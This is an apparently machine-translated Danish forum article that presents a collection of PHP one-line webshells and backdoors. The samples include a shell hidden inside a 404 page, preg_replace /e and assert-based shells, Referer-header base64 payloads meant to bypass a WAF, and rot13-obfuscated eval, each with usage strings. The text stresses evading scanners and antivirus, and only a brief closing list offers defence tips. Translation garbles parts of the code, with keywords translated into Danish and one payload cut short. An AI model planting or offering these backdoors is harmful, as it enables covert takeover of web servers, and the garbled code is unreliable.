Vi behandler disse PHP-bagdørsprogrammer med en læringsmentalitet, og meget PHP-bagdørskode giver os mulighed for at se, hvor velmenende programmører er.
Kraftfuld PHP-bagdør i én sætning
Denne slags bagdør tillader hjemmesider,Serveradministratorer er meget besværlige og må ofte ændre metoder for at udføre forskellige detektioner, og mange nye skriveteknikker kan ikke opdages og håndteres med almindelige detektionsmetoder.
I dag vil vi tælle nogle interessante PHP-trojanere.
1. Skjul PHP-ponyer ved hjælp af 404 sider:
[mw_shl_code=php, sandt] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Ikke Fundet</title> </head><body> <h1>Ikke fundet</h1> <p>Den ønskede URL blev ikke fundet på denne server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 ikke fundet'); ?>[/mw_shl_code]
404-siden er en ofte brugt fil på hjemmesiden, og få vil tjekke og ændre den, efter den generelt anbefales, så vi kan bruge den til at skjule bagdøren.
2. Skjult PHP uden funktioner i én sætning:
[mw_shl_code=php,true]<?php session_start(); $_POST['kode'] & $_SESSION['theCode'] = trim($_POST['kode']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Tildel $_POST['kode'] til $_SESSION['theCode'], og udfør derefter $_SESSION['theCode'], med det særlige at der ikke er nogen signaturkode.
Hvis du bruger et scanningsværktøj til at tjekke koden, vil det ikke alarmere og opnå målet.
3. Super Stealthy PHP-bagdør:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
GET-funktionen alene udgør en trojaner;
Sådan bruger du:
[mw_shl_code=php, sandt] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Efter udførelse genererer den nuværende mappe c.php en sætnings-trojaner; når parameteren A evalueres, fejlede fejl-generering af trojan, og når den assertes, rapporterer den også en fejl, men den genererer en trojansk hest, som ikke må undervurderes.
Niveauanmodning, kode til at køre PHP-bagdøren:
Denne metode implementeres med to filer, fil 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset=UTF-8′);
//要执行的代码 $code= <<<KODE phpinfo(); KODE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "A=10&B=ab&c=34&d=Re&E=32&F=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSK, CURLOPT_RETURNTRANSFER => SANDT, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Kør base64-kodede kode gennem HTTP_REFERER i HTTP-forespørgslen for at opnå backdoor-effekten.
Det er godt at bruge denne idé til at omgå waf.
4.PHP backdoor-generatorværktøj Weevely
weevely er en PHP-specifik enWebshell fri software kan bruges til at simulere en forbindelsesshell lignende telnet. Weevely bruges normalt til udnyttelse af webprogrammer, skjul bagdøre eller telnet-lignende metoder i stedet for websidebaseret administration. Server-side PHP-koden, der genereres af Weevely, er base64-kodet, så den kan bedrage mainstream antivirussoftware og IDS. Når du uploader server-side koden, kan du som regel køre den direkte gennem Weevely.
De funktioner, der bruges i backdooren, er almindeligt anvendte strengbehandlingsfunktioner, og funktioner som evaluering og system, der bruges som inspektionsregler, vil ikke optræde direkte i koden, så backdoor-filen kan omgå kontrollen i backdoor-søgeværktøjet. Scanning med dark groups web-bagdørsdetektionsværktøj viser, at filen ikke er truet.
Ovenstående er en generel introduktion, og de relevante anvendelsesmetoder introduceres ikke her, men blot en simpel videnskabelig popularisering.
4. Tre deformerede PHP-trojanere på én sætning Den første:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Den anden
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Skriv http://site/2.php?_=assert&__=eval($_POST['pass']) adgangskode i køkkenkniven er pass.
Hvis du bruger de ekstra data fra køkkenkniven, er den mere skjult, eller du kan bruge andre injektionsværktøjer, fordi den er indsendt efter indsendelse.
Den tredje
[mw_shl_code=php, sandt] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ('riny') er den kodede evaluering, som fuldstændig undgår nøgleord uden at miste effekten, hvilket får folk til at kaste blod op!
5. Til sidst, list nogle avancerede bagdøre til PHP-trojanere:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Adgang"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; inkludere($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Adgang"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php, sandt]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
For at opsummere kan disse PHP-bagdøre beskrives som fuldendte; hvis du ikke passer på, vil du helt sikkert blive narret, og hvad er den højeste prioritet i vores artikel i dag? De vigtigste punkter findes i resuméet nedenfor!
Sådan håndterer du PHP en enkeltsætnings bagdør: Vi understreger nogle få nøglepunkter, og hvis du læser denne artikel, tror jeg ikke, du er lægmand, så jeg vil ikke være langtrukken:
- Vær opmærksom på sikkerhed, når du skriver PHP-programmer
- Serverlogfiler bør læses ofte og sikkerhedskopieres hyppigt
- Streng tilladelsestildeling for hvert site
- Hyppige batch-sikkerhedsgennemgange af dynamiske filer og mapper
- Lær hvordan du udfører manuel antivirus "Adfærdsvurdering, undersøgelse og drab"
- Følg med, eller infiltrer en aktiv cybersikkerhedslejr
- Selv en funktion kan bruges som regel for hierarkisk behandling af servermiljøet
Vi mener, at når der er flere sider at administrere og store mængder data, bør vi rimeligt anvende nogle hjælpeværktøjer, men vi bør ikke udelukkende stole på disse værktøjer, teknologien opdateres og forbedres hele tiden, det vigtigste er, at du lærer og forstår tankegangen bag at skrive disse stærke bagdørsfolk, og rolleoverførsel kan give dig større fremskridt.
|